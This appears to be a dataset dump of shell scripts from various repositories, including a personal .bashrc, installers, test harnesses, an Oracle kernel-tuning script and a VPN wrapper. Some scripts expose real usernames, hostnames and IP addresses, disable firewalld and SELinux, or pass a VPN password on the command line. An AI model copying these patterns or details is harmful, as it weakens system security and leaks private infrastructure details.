blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
60050e75252eb6ed6a4a70d83efbcd844c9eab22 | Shell | s4ur4b/Shell-Scripting | /day5-sequence/Practise/pb2_2_2.sh | UTF-8 | 324 | 3.359375 | 3 | [] | no_license | read -p "enter a number for week day: " n
echo "the week day is - "
case $n in
0 ) echo "enter a value between 1 and 7"
;;
1 ) echo sunday
;;
2 ) echo monday
;;
3 ) echo tuesday
;;
4 ) echo wednesday
;;
5 ) echo thursday
;;
6 ) echo friday
;;
7 ) echo saturday
;;
*) echo "There are only seven days in a week"
esac
| true |
e346bdb9f361c27060691cecae6581a27bf03255 | Shell | 6piR/ginseng | /script/.bashrc | UTF-8 | 8,369 | 3.328125 | 3 | [] | no_license | # ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
[ -z "$PS1" ] && return
# don't put duplicate lines in the history. See bash(1) for more options
# don't overwrite GNU Midnight Commander's setting of `ignorespace'.
HISTCONTROL=$HISTCONTROL${HISTCONTROL+,}ignoredups
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoreboth
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
# We have color support; assume it's compliant with Ecma-48
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
# a case would tend to support setf rather than setaf.)
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
#alias dir='dir --color=auto'
#alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
# some more ls aliases
#alias la='ls -A'
#alias l='ls -CF'
alias bashrc='gedit ~cipiere/.bashrc &'
alias clearfullapi='rm -r api/;rm *.pl; rm *~'
alias clearapi='rm -r api/; rm *~'
alias gobackup='cd /tmp/quattor/backup/network_component;t2'
alias gocrri='ssh secipier@hpc1.clermont-universite.fr'
alias goerror='cd /tmp/quattor/error/network_component;t2'
alias gofc='ssh cipiere@fc.isima.fr'
alias Xgofc='ssh -X cipiere@fc.isima.fr'
alias gonote='cd /home/cipiere/Documents/ginseng/note'
alias goginseng='cd /home/cipiere/Documents/ginseng'
alias gogithub='cd /home/cipiere/Documents/github'
alias gog2imfc='ssh g2im@fc.isima.fr'
alias gog2imwebcrri='ssh g2im@193.55.252.158'
alias gog2imcrri='ssh g2imweb@193.55.252.153'
alias gowebcrri='ssh secipier@193.55.252.158'
alias gomysqlcrri='ssh secipier@193.55.252.158'
alias gohtml='google-chrome api/html/index.html &'
alias gohispod="cd /home/cipiere/Documents/synchro_git/hispod"
alias goperl='cd /home/cipiere/Documents/ginseng/perl/;t2'
alias goplanning='cd /home/checkeol/Bureau/_Stage/planning;t2'
alias gorapport='cd /home/checkeol/Bureau/_Stage/rapport;t2'
alias goremote='rdesktop lbts01 -g 1500x1000 -u scipiere'
alias gospe='cd /home/checkeol/Bureau/_Stage/rapport/specifications;t2'
alias gostage='cd /home/checkeol/Bureau/_Stage;t2'
alias gosvn='cd /home/checkeol/Bureau/_Stage/Perl/SVN_code/;t2'
alias gotest='cd /home/checkeol/Bureau/_Stage/Perl/test;t2'
alias gotmp='cd /tmp/quattor;tree'
alias goui='ssh 193.55.252.161 -l secipier' #ui.lifegrid.fr
alias gofaouzi='ssh 193.55.252.161 -l fajaziri' #ui.lifegrid.fr
alias gotron='ssh 172.16.66.63 -l root' #CentOS 5.5 DHCP bureau C103 machine cipiere
alias lg='ls | grep'
alias lga='lla | grep'
alias lla='ls -alh'
alias ll='ls -lh'
alias ln='ls -rlth'
alias lna='ls -rltha'
alias startsamba='/etc/rc.d/init.d/smb start'
alias stopsamba='/etc/rc.d/init.d/smb stop'
alias startcups='/etc/init.d/cups start'
alias stopcups='/etc/init.d/cups stop'
alias t0='tree -L 1 -d'
alias t1='tree -L 1'
alias t2='tree2'
alias t2a='tree2 -a'
alias t3='tree -L 3'
alias t4='tree -L 4'
alias tf='tree -fi'
alias tg='treeflat | grep'
alias tga='treeflat -a | grep'
alias tree2='tree -L 2'
alias treeflat='tree -fi'
alias vi='vim'
function himylord() {
google-chrome "http://xkcd.com/";
google-chrome "http://cereales.lapin.org/";
google-chrome "http://oglaf.lapin.org/index.php";
google-chrome "http://oglaf.com/";
google-chrome "http://grooveshark.com/#/cipiere/music/favorites";
google-chrome "https://mail.google.com/mail/?hl=fr#inbox";
google-chrome "https://www.google.com/calendar/render?tab=mc";
google-chrome "https://clrwww.in2p3.fr/mail/";
}
function amazon() {
google-chrome "http://www.amazon.com/s/ref=nb_sb_noss?__mk_fr_FR=%C5M%C5Z%D5%D1&url=search-alias%3Daps&field-keywords=+"$1 ;
google-chrome "http://www.amazon.fr/s/ref=nb_sb_noss?__mk_fr_FR=%C5M%C5Z%D5%D1&url=search-alias%3Daps&field-keywords=+"$1 ;
google-chrome "http://www.amazon.co.uk/s/ref=nb_sb_noss?__mk_fr_FR=%C5M%C5Z%D5%D1&url=search-alias%3Daps&field-keywords=+"$1 ;
google-chrome "http://www.amazon.de/s/ref=nb_sb_noss?__mk_fr_FR=%C5M%C5Z%D5%D1&url=search-alias%3Daps&field-keywords=+"$1 ;
}
function search() { google-chrome "http://www.google.fr/search?hl=fr&source=hp&q="$1 &}
function go() { google-chrome "http://www.google.fr/search?hl=fr&source=hp&q="$1 &}
function enfr() { google-chrome http://www.wordreference.com/enfr/$1;}
function fren() { google-chrome http://www.wordreference.com/fren/$1;}
function conjugaison() { google-chrome "http://www.la-conjugaison.fr/du/verbe/"$1.php;}
function cpgw() { scp $1 scipiere@lbgw: ;}
function cp2ui() { scp $1 secipier@193.55.252.161:from_c103/ ;}
function cp2faouzi() { scp $1 fajaziri@193.55.252.161:/home/fajaziri/phylgrid/$1 ;}
function cp2fc() { scp $1 cipiere@fc.isima.fr:/home/etud/cipiere/from_outside/$1 ;}
function cp2hispodfc() { scp $1 g2im@fc.isima.fr:/home/ext/g2im/HISPOD/$1 ;}
function cp2webcrri() { scp $1 secipier@193.55.252.158:/home/secipier/public_html/$1 ;}
function cp2crri() { scp $1 secipier@193.55.252.158:/home/secipier/ginseng/csv/$1 ;}
function cp2mysqlcrri() { scp $1 secipier@193.55.252.158:/home/secipier/ginseng/csv/$1 ;}
function cpfromfc() { scp cipiere@fc.isima.fr:/home/etud/cipiere/to_export/$1 ./$1 ;}
function cpfromfaouzi() { scp fajaziri@193.55.252.161:/home/fajaziri/phylgrid/$1 ./$1;}
function cpfromphylclustercrri() { scp secipier@193.55.252.153:/home/secipier/phylcluster/$1 . ;}
function cpfromwebg2im() { scp secipier@193.55.252.158:/home/secipier/public_html/$1 . ;}
function cpfromg2imresult() { scp g2im@fc.isima.fr:/home/ext/g2im/public_html/hispod/results/$1 /home/cipiere/Documents/synchro_git/hispod/hispod_pc/fromg2im/$1;}
function cpfromg2im() { scp g2im@fc.isima.fr:/home/ext/g2im/HISPOD/$1 /home/cipiere/Documents/synchro_git/hispod/hispod_pc/fromg2im/$1;}
function hispod_export() { gcc $1.iUBDegen.c -o $1.IUBREV.cipiere; cp2g2im $1.IUBREV.cipiere; cp2g2im $1.hispod_pc.pl;}
alias doxy='echo "/home/checkeol/Bureau/_Stage/Perl/SVN_code/doxy_filter"'
doxy="/home/checkeol/Bureau/_Stage/Perl/SVN_code/doxy_filter"
#alias 2doxy="cp $1 $doxy/" #A finir un jour ou pas .... Pour prendre des paramètres utiliser function
#;cd $doxy;t2'
#;doxygen $1;'
alias cd..='cd ..'
alias cd2='cd ../..'
alias cd3='cd ../../..'
alias cd4='cd ../../../..'
alias cd5='cd ../../../../..'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
| true |
fd12341efc88d5639083c42726e3f01dc454152e | Shell | tangz1987/celo-monorepo | /packages/protocol/scripts/bash/deploy_release_contracts.sh | UTF-8 | 1,709 | 3.9375 | 4 | [
"Apache-2.0",
"LGPL-3.0-only",
"LGPL-2.1-or-later"
] | permissive | #!/usr/bin/env bash
set -euo pipefail
# Deploys all grants detailed in `GRANTS_FILE` from the corresponding entity.
#
# Flags:
# -n: Name of the network to upgrade
# -f: Address of the account deploying the grant
# -g: File containing grant information
# -s: Amount of gold for beneficiary to start with for transactions
# -o: (Optional) File to output results to
# -really: (Optional) Reply "yes" to prompts about deploying grants (Be careful!)
#
# Example:
# `./scripts/bash/deploy_release_contracts.sh -n development -f scripts/truffle/releaseGoldContracts.json -g 50`
NETWORK=""
GRANTS_FILE=""
FROM=""
START_GOLD=""
OUTPUT_FILE=""
REALLY=""
while getopts 'n:f:g:s:o:r:' flag; do
case "${flag}" in
n) NETWORK="$OPTARG" ;;
f) FROM="${OPTARG}" ;;
g) GRANTS_FILE="${OPTARG}" ;;
s) START_GOLD="${OPTARG}" ;;
o) OUTPUT_FILE="${OPTARG}" ;;
r) REALLY="--yesreally" ;;
*) error "Unexpected option ${flag}" ;;
esac
done
[ -z "$NETWORK" ] && echo "Need to set the NETWORK via the -n flag" && exit 1;
[ -z "$FROM" ] && echo "Need to set the FROM address vai the -f flag" && exit 1;
[ -z "$GRANTS_FILE" ] && echo "Need to set the GRANTS_FILE via the -g flag" && exit;
[ -z "$START_GOLD" ] && echo "No starting gold provided via -s flag: defaulting to 1cGld" && START_GOLD=1;
[ -z "$OUTPUT_FILE" ] && echo "No output file provided, will print output to console."
if ! nc -z 127.0.0.1 8545 ; then
echo "Port 8545 not open"
exit 1
fi
yarn run build && \
yarn run truffle exec ./scripts/truffle/deploy_release_contracts.js \
--network $NETWORK --from $FROM --grants $GRANTS_FILE --start_gold $START_GOLD --output_file $OUTPUT_FILE $REALLY --build_directory $PWD/build/$NETWORK \ | true |
d4b2d478f110c186e861c5f25525f2b4f783720e | Shell | dhnomura/install-grid-oracle-single-19 | /customize_kernel.sh | UTF-8 | 1,121 | 2.53125 | 3 | [] | no_license | #!/bin/bash
echo "
grid soft nproc 2047
grid hard nproc 16384
grid soft nofile 1024
grid hard nofile 65536
grid soft stack 10240
grid hard stack 32768
oracle soft nproc 2047
oracle hard nproc 16384
oracle soft nofile 1024
oracle hard nofile 65536
oracle soft stack 10240
oracle hard stack 32768
" >> /etc/security/limits.conf
echo "fs.file-max = 6815744
kernel.sem = 250 32000 100 128
kernel.shmmni = 4096
kernel.shmall = 1073741824
kernel.shmmax = 4398046511104
kernel.panic_on_oops = 1
net.core.rmem_default = 262144
net.core.rmem_max = 4194304
net.core.wmem_default = 262144
net.core.wmem_max = 1048576
net.ipv4.conf.all.rp_filter = 2
net.ipv4.conf.default.rp_filter = 2
fs.aio-max-nr = 1048576
net.ipv4.ip_local_port_range = 9000 65500
" > /etc/sysctl.d/98-oracle.conf
/sbin/sysctl -p /etc/sysctl.d/98-oracle.conf
systemctl stop firewalld
systemctl disable firewalld
SELINUX=`cat /etc/selinux/config|grep ^SELINUX=|awk -F "=" '{print $2}'`
if SELINUX == "enforcing"; then
sed -i 's/enforcing/permissive/g' /etc/selinux/config
fi
setenforce Permissive
service avahi-daemon stop
chkconfig avahi-daemon off
| true |
06be773cf9d64fedd00e5d2aee1d5c563e1ad240 | Shell | k3tan172/bitcoin-tutorials | /lnd.updates/lnd.from.source.sh | UTF-8 | 1,999 | 3.515625 | 4 | [] | no_license | # LND Update Script
# Download and run this script on the RaspiBlitz:
# $ wget https://raw.githubusercontent.com/openoms/bitcoin-tutorials/master/lnd.updates/lnd.from.source.sh && sudo bash lnd.from.source.sh
#### Build from Source
# To quickly catch up get latest patches if needed
repo="github.com/lightningnetwork/lnd"
echo "Paste the latest or desired commit ID to checkout from"
echo "See the list at: https://github.com/lightningnetwork/lnd/commits/master"
echo "Example:"
echo "4068e78af690f9b4a598de1f3f0b21b5560dd146"
echo "(if left empty will use the latest state of the master branch)"
echo "and press ENTER"
read commit
# commit="580509191007617afa6da4b6b0151b4b5313eb72"
# BUILDING LND FROM SOURCE
echo "*** Build LND from Source ***"
echo "repo=${repo}"
echo "up to the commit=${commit}"
sudo systemctl stop lnd
export GOROOT=/usr/local/go
export PATH=$PATH:$GOROOT/bin
export GOPATH=/usr/local/gocode
export PATH=$PATH:$GOPATH/bin
echo "Deleting old source..."
sudo rm -r /usr/local/gocode/src/github.com/lightningnetwork/lnd
go get -d $repo
echo "Building LND..."
cd $GOPATH/src/${repo}
sudo git checkout ${commit}
make && make install
sudo chmod 555 /usr/local/gocode/bin/lncli
sudo chmod 555 /usr/local/gocode/bin/lnd
sudo bash -c "echo 'export PATH=$PATH:/usr/local/gocode/bin/' >> /home/admin/.bashrc"
sudo bash -c "echo 'export PATH=$PATH:/usr/local/gocode/bin/' >> /home/pi/.bashrc"
sudo bash -c "echo 'export PATH=$PATH:/usr/local/gocode/bin/' >> /home/bitcoin/.bashrc"
lndVersionCheck=$(lncli --version)
if [ ${#lndVersionCheck} -eq 0 ]; then
echo "FAIL - Something went wrong with building LND from source."
echo "Sometimes it may just be a connection issue. Reset to fresh Rasbian and try again?"
exit 1
fi
echo ""
echo "** Link to /usr/local/bin ***"
sudo ln -s /usr/local/gocode/bin/lncli /usr/local/bin/lncli
sudo ln -s /usr/local/gocode/bin/lnd /usr/local/bin/lnd
sudo systemctl restart lnd
echo ""
echo "LND VERSION INSTALLED: ${lndVersionCheck} up to commit ${commit} from ${repo}" | true |
343830efd2bdf1140e0a489666fb9db6e94bcd17 | Shell | Mbote-Joseph/System-Programming | /ASSIGNMENT/question7.sh | UTF-8 | 471 | 3.015625 | 3 | [] | no_license | #! /bin/bash
alias allEmails=$(cat email_addresses.txt | tr -s '\n' ' ' )
Message="Inviting the you as our computing student to our 21st Open Webinar on innovation incubation scheduled for Friday, 25th June 2021 from 10:00 A.M. The Zoom link for joining in on Friday is as given below. We shall also broadcast the webinar on our youtube channel. Youtube link: https://youtu.be/ONVTA7LKMIs"
echo "$Message" | mail -s "invite to a COVID -19 programming webinar" allEmails
| true |
25af5249c8d5104a05e552ff3e28052bd33d09a0 | Shell | o-ran-sc/ric-plt-lib-rmr | /doc/src/rtd/scrape_types.sh | UTF-8 | 3,427 | 3.21875 | 3 | [
"CC-BY-4.0",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | # :vim setet ts=4 sw=4:
#==================================================================================
# Copyright (c) 2020 Nokia
# Copyright (c) 2020 AT&T Intellectual Property.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#==================================================================================
# Mnemonic: scrape_types.sh
# Abstract: This parses the RIC_msg_types header file and geneates
# some doc. See the header file for a description of what
# is recognised by this parser.
# Date: 23 June 2020
# Author: E. Scott Daniels
# ----------------------------------------------------------------------------------
sdir="../../../docs" # dir where RTD scraper looks
input=../../../src/rmr/common/include/RIC_message_types.h
xsrc=/tmp/PID$$.xfm
export XFM_OUTPUT_TYPE=rst # it should be this
out_suffix=rst
while [[ $1 == -* ]]
do
case $1 in
-o) export XFM_OUTPUT_TYPE=$2
out_suffix=$2
shift
;;
-t) sdir=$2; shift;;
esac
shift
done
export OUTPUT_TYPE=$XFM_OUTPUT_TYPE # compat with project setup
cat <<endKat >$xsrc
.** CAUTION:
.** This {X}fm source is generated by $0 in $PWD. Any edits
.** are very likely to be lost.
.**
.dv doc_title RIC Message Types
.im setup.im
endKat
sed 's/^ *//' $input | awk '
BEGIN {
space_ok = 1
off = 0 # snarf types
anything = 1
desc = 2
}
# starting with token stk, build remaining tokens into a record
function build_rec( stk ) {
rec = ""
for( ; stk <= NF; stk++ ) {
rec = rec $(stk) " "
}
return rec
}
# ------------------------------------------------------------------------
snarf && /^$/ && space_ok {
printf( "&space\n\n" );
space_ok = 0 # eat multiple blank lines
if( snarf == desc ) {
snarf = off
}
next
}
$1 == "/*+" {
expect_header = 1
snarf = anything
space_ok = 1
next
}
expect_header {
if( dl_open ) {
printf( "&end_dlist\n" );
dl_open = 0
}
printf( "\n&h2(%s)\n", $0 )
space_ok = 1
expect_header = 0
next
}
snarf && $1 == "*/" {
snarf = off
space_ok = 0
next
}
/^#[ ]*define/ {
if( $4 == "//--" ) { # ignored completely
next
}
if( ! dl_open ) {
printf( "\n&beg_dlist( 1.5i Helvetica-bold : : 30,70) \n" )
dl_open = 1
}
if( $4 == "//+" ) {
printf( "&di(%s) %s\n", $2, build_rec( 5 ) )
} else {
if( $4 == "//-" ) {
printf( "&di(%s) deprecated\n", $2 )
} else {
printf( "&di(%s) &break\n", $2 )
}
}
snarf = desc; # snarf next only if //+ is the first token
next
}
snarf == desc {
if( $1 == "//+" ) { # continued description, add it on
printf( "%s\n", build_rec( 5 ) )
} else {
snarf = off
}
next
}
snarf == anything {
print
next
}
END {
if( dl_open ) {
printf( "&end_dlist\n" );
}
printf( ".qu\n" )
}
' >>$xsrc
tfm $xsrc stdout | sed 's/^ //; s/ *$//' >$sdir/msg_types.$out_suffix
rm -f /tmp/PID$$.*
| true |
7235c2133d3c9f641e9afb925c9c59d1a866bc9d | Shell | jonmarty/deepops-fbl-ood | /workloads/jenkins/scripts/test-monitoring.sh | UTF-8 | 3,583 | 3.296875 | 3 | [
"BSD-3-Clause"
] | permissive | #!/bin/bash
# Install monitoring with persistance, verify it deletes, re-install without persistance, verify DCGM metrics, verify it deletes
# We disable/re-enable "-e" in this script because polling will error until service come up and we want to collect output and debug
set -ex
source workloads/jenkins/scripts/jenkins-common.sh
# Ensure working directory is root
cd "${ROOT_DIR}"
# Deploy Monitoring
source ./scripts/k8s/deploy_monitoring.sh
# The deployment script exports the http endpoints, verify it returns a 200
# It typically takes ~1 minutes for all pods and services to start, so we poll
timeout=600
time=0
set +e # This polling is expected to fail, so remove the -e flag for the loop
while [ ${time} -lt ${timeout} ]; do
curl -s --raw -L "${prometheus_url}" | grep Prometheus && \
curl -s --raw -L "${grafana_url}" | grep Grafana && \
curl -s --raw -L "${alertmanager_url}" | grep Alertmanager && \
echo "Monitoring URLs are all responding" && \
pass=true && break
let time=$time+15
sleep 15
done
# Fail if timed out
if [ "${pass}" != "true" ]; then
echo "Timed out getting monitoring responses"
curl -s --raw -L "${prometheus_url}"
curl -s --raw -L "${grafana_url}"
curl -s --raw -L "${alertmanager_url}"
exit 1
fi
set -e # The loop is done, and we got debug if it failed, re-enable fail on error
# Verify that the polling option agrees that things are up
./scripts/k8s/deploy_monitoring.sh -w
# TODO: Create a test to verify storage is persisting
# Delete Monitoring (this should take ~30 seconds)
./scripts/k8s/deploy_monitoring.sh -d
set +e
curl -s --raw -L "${prometheus_url}" | grep Prometheus && \
curl -s --raw -L "${grafana_url}" | grep Grafana && \
curl -s --raw -L "${alertmanager_url}" | grep Alertmanager && \
echo "Monitoring URLs are all responding when they should have been deleted" && \
exit 1
set -e
# Deploy Monitoring without persistent data (this should be faster because containers have already been downloaded)
source ./scripts/k8s/deploy_monitoring.sh -x
# The deployment script exports the http endpoints, verify it returns a 200
# It typically takes ~1 minutes for all pods and services to start, so we poll
timeout=600
time=0
set +e # This polling is expected to fail, so remove the -e flag for the loop
while [ ${time} -lt ${timeout} ]; do
curl -s --raw -L "${prometheus_url}" | grep Prometheus && \
curl -s --raw -L "${grafana_url}" | grep Grafana && \
curl -s --raw -L "${alertmanager_url}" | grep Alertmanager && \
echo "Monitoring URLs are all responding" && \
pass=true && break
let time=$time+15
sleep 15
done
# Fail if timed out
if [ "${pass}" != "true" ]; then
echo "Timed out getting monitoring responses"
curl -s --raw -L "${prometheus_url}"
curl -s --raw -L "${grafana_url}"
curl -s --raw -L "${alertmanager_url}"
exit 1
fi
set -e # The loop is done, and we got debug if it failed, re-enable fail on error
# Get some debug for Pods that did/didn't come up and verify DCGM metrics
kubectl get all -n monitoring
bash -x ./workloads/jenkins/scripts/test-dcgm-metrics.sh slurm-node # We use slurm-node here because it is GPU only, kube-node includes the mgmt plane
# Delete Monitoring
./scripts/k8s/deploy_monitoring.sh -d
set +e
curl -s --raw -L "${prometheus_url}" | grep Prometheus && \
curl -s --raw -L "${grafana_url}" | grep Grafana && \
curl -s --raw -L "${alertmanager_url}" | grep Alertmanager && \
echo "Monitoring URLs are all responding when they should have been deleted" && \
exit 1
set -e
| true |
725999785eccf7c1448853b5d3700943024f0da9 | Shell | phoronix-test-suite/test-profiles | /pts/blender-3.3.1/install.sh | UTF-8 | 500 | 2.78125 | 3 | [
"MIT"
] | permissive | #!/bin/sh
tar -xf blender-3.3.0-linux-x64.tar.xz
unzip -o cycles_benchmark_20160228.zip
mv benchmark/bmw27/*.blend ~
mv benchmark/classroom/*.blend ~
mv benchmark/fishy_cat/*.blend ~
mv benchmark/pabellon_barcelona/*.blend ~
rm -rf benchmark
echo "#!/bin/bash
cd blender-3.3.0-linux-x64
BLEND_ARGS=\$@
if [[ \$@ =~ .*CPU.* ]]
then
BLEND_ARGS=\${BLEND_ARGS/_gpu/_cpu}
fi
./blender \$BLEND_ARGS > \$LOG_FILE 2> /dev/null
echo \$? > ~/test-exit-status
rm -f output.test" > blender
chmod +x blender
| true |
4cb8ae5ce1a6b40704948691f9e425248a440dfe | Shell | JeffreyDeYoung/linux-helpers | /codeFormatJava.zsh | UTF-8 | 782 | 3.703125 | 4 | [] | no_license | #!/bin/zsh
#author: Jeffrey DeYoung
#Use to code format java files per the google style guide.
#Eclipse is required for this script to work; it's basically wrapping an Eclipse command.
#Requires zsh because I don't want to write an if statment for bash.
#
#To use, add to your shells .zshrc or .bashrc file.
#Ex:
#ECLIPSE_BIN=~/eclipse/java-neon/eclipse/eclipse
#source ~/projects/linux-helpers/codeFormatJava.zsh
function codeFormatJava()
{
called=$_
echo "Performing Java Code Format per Google Style Guide on current directory: `pwd`..."
#echo $called
DIR=$(dirname ${(%):-%x})
#echo $DIR
$ECLIPSE_BIN -nosplash -application org.eclipse.jdt.core.JavaCodeFormatter -config $DIR/org.eclipse.jdt.core.prefs .
}
#handy alias for calling this
alias javaformat="codeFormatJava"
| true |
13d95237b5f492754e5284244a74c2ccb6a67fa5 | Shell | dorucioclea/iguanavpn-cli | /lib/vpn-wrapper.sh | UTF-8 | 2,029 | 3.9375 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env nix-shell
#! nix-shell vpn-wrapper.nix -i bash
set -o errexit
set -o pipefail
set -e
set -u
# set -x
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
OPENCONNECT=$(which openconnect)
VPNSLICE=$(which vpn-slice)
WITH_VPNSLICE=true
ERR=31
INFO=32
BOLD=1
NORM=0
out() {
echo -e "\e[${1};${2}m${@:3}\e[0m"
}
err() {
out $BOLD $ERR "${@:1}"
}
info() {
out $NORM $INFO "${@:1}"
}
if [[ $# -lt 2 ]]; then
err "Usage: $0 <config> <password> [--with-vpnslice=false]";
exit 1;
fi
CONFIG=$1
PASSWORD=$2
SECRET=$3
if [[ "$3" == "--with-vpnslice=false" ]]; then
WITH_VPNSLICE=false
fi
setup_help() {
err "$CONFIG should exist and contain files: [username, host and slice]."
err "Run setup.sh"
exit 2;
}
[ ! -d $CONFIG ] && setup_help
config_files=($CONFIG/username $CONFIG/host $CONFIG/slice)
for f in username host slice; do
if [ ! -f $CONFIG/$f ]; then
setup_help
fi
done
USERNAME=$(head -n 1 "$CONFIG/username")
HOST=$(head -n 1 "$CONFIG/host")
SLICES=$(cat "$CONFIG/slice" | tr '\n' ' ')
SERVERCERT=$(test -f "$CONFIG/servercert" && cat "$CONFIG/servercert")
info -------------------------
info OPENCONNECT: $OPENCONNECT
info VPN-SLICE: $VPNSLICE
info USERNAME: $USERNAME
info HOST: $HOST
info SERVERCERT: $SERVERCERT
info -------------------------
info "Kicking off keep-alive pinger."
PINGHOSTS=$CONFIG/pinghosts
BGPID=
if [ -f $PINGHOSTS ]; then
$DIR/vpn-keepalive.sh $PINGHOSTS &
fi
info "Running openconnect as sudo..."
if [ ! -z "$SERVERCERT" ]; then
SERVERCERT="--servercert $SERVERCERT"
fi
VPNC_SCRIPT=""
if [[ $WITH_VPNSLICE == "true" ]]; then
VPNC_SCRIPT=" -s '${VPNSLICE} ${SLICES}' "
fi
sudo sh <<EOF
printf '${PASSWORD}' | $OPENCONNECT $SERVERCERT --libproxy --passwd-on-stdin --user='$USERNAME' $VPNC_SCRIPT $HOST
echo "Shutting down"
EOF
if [ -f $PINGHOSTS ]; then
echo "Killing keep alive $BGPID"
BPID=$(ps S | grep '[v]pn-keepalive.sh' | awk '{print $1}')
kill -9 $BPID
fi
echo "Done"
| true |
9bb990902937774d3f7115f2205d5955d274b3b9 | Shell | ralberts/coffee-dash-button | /dashButton/start.sh | UTF-8 | 271 | 3 | 3 | [] | no_license | #!/bin/bash
coffeeProcess=`ps a | grep -v grep | grep coffee`
if [ -z "$coffeeProcess" ]
then
cd /home/pi/Desktop/coffee-dash-button/dashButton
sudo npm start &> /home/pi/Desktop/coffee-dash-button/dashButton/output.txt
else
echo "Coffee script already running."
fi
| true |
0aef6280615222b811d8cf854f7040b0c47026ac | Shell | camuso/scripts | /foreachfile | UTF-8 | 2,243 | 4.53125 | 5 | [] | no_license | #!/bin/bash
#
# foreachfile
#
# filename placeholder token to be used from the command line and for
# substitution in the individual commands
#
token="%"
usagestr=$(
cat <<EOF
foreachfile filespec body
filespec - file specification, can have wildcards
body - body of the loop
Both filespec and body must be enclosed in double quotes.
In the body of the loop, the current file is denoted by
this token: '$token'
Use \\ to escape \\ , %, $, etc.
Example:
foreachfile "*.patch" "echo $token; grep -m1 'Subject' $token"
\0
EOF
)
usage() {
echo -e "$usagestr"
exit
}
# parse_cmd
#
# If the command contains the token, then replace it with the current filename
# and execute the command.
#
# $1 - current filename
# $2 - command
#
parse_cmd() {
local file="$1" # get the name of the current file
shift # shift past the filename
local cmd="$@" # remainder of command line is command string
local ary=($cmd) # create an array from the command string
local index=0 # index for the array
for index in "${!ary[@]}"; do
[[ ${ary[$index]} == "$token" ]] && ary[$index]="$file"
done
echo "${ary[@]}" >> /tmp/cmd
}
[ $# -gt 0 ] || usage
# shopt -s extglob
declare filespec="$1" # file specification including wildcards
declare files=$(ls -1 $filespec) # list of files
echo -e \
" List of Files\n"\
"============="
echo "$files"
shift # shift past the file specification
declare body="$@" # remainder of command line is loop body
declare cmdary # array of commands to be executed in loop
# Create a dummy script file to execute the commands
#
touch /tmp/cmd
chmod +x /tmp/cmd
# Tokenize the loop body into an array using ';' as the IFS separator.
#
IFS=";" read -ra cmdary <<<"$body"
echo -e \
"\n List of Commands\n"\
"================"
for key in "${!cmdary[@]}"; do echo $key ${cmdary[$key]}; done
# For each for the files in the list, execute the body of commands
#
for f in $files; do
> /tmp/cmd
# Substitute the token with the file name in each command that has
# a token and write the command line out to the /tmp/cmd file.
#
for key in "${!cmdary[@]}"; do
parse_cmd $f "${cmdary[$key]}"
done
# Execute the commands
#
/tmp/cmd
done
# Delete the dummy script file
#
rm -f /tmp/cmd
| true |
763ec41ebce7fe51bb6ac822fd8c64dc0569148e | Shell | cisagov/pca-gophish-composition | /gophish-tools/complete_campaign.sh | UTF-8 | 1,163 | 4.28125 | 4 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | #!/usr/bin/env bash
# complete_campaign.sh CAMPAIGN_ID
# This script simplifies the process of completing a campaign on the
# GoPhish server running in the local Docker composition.
set -o errexit
set -o nounset
set -o pipefail
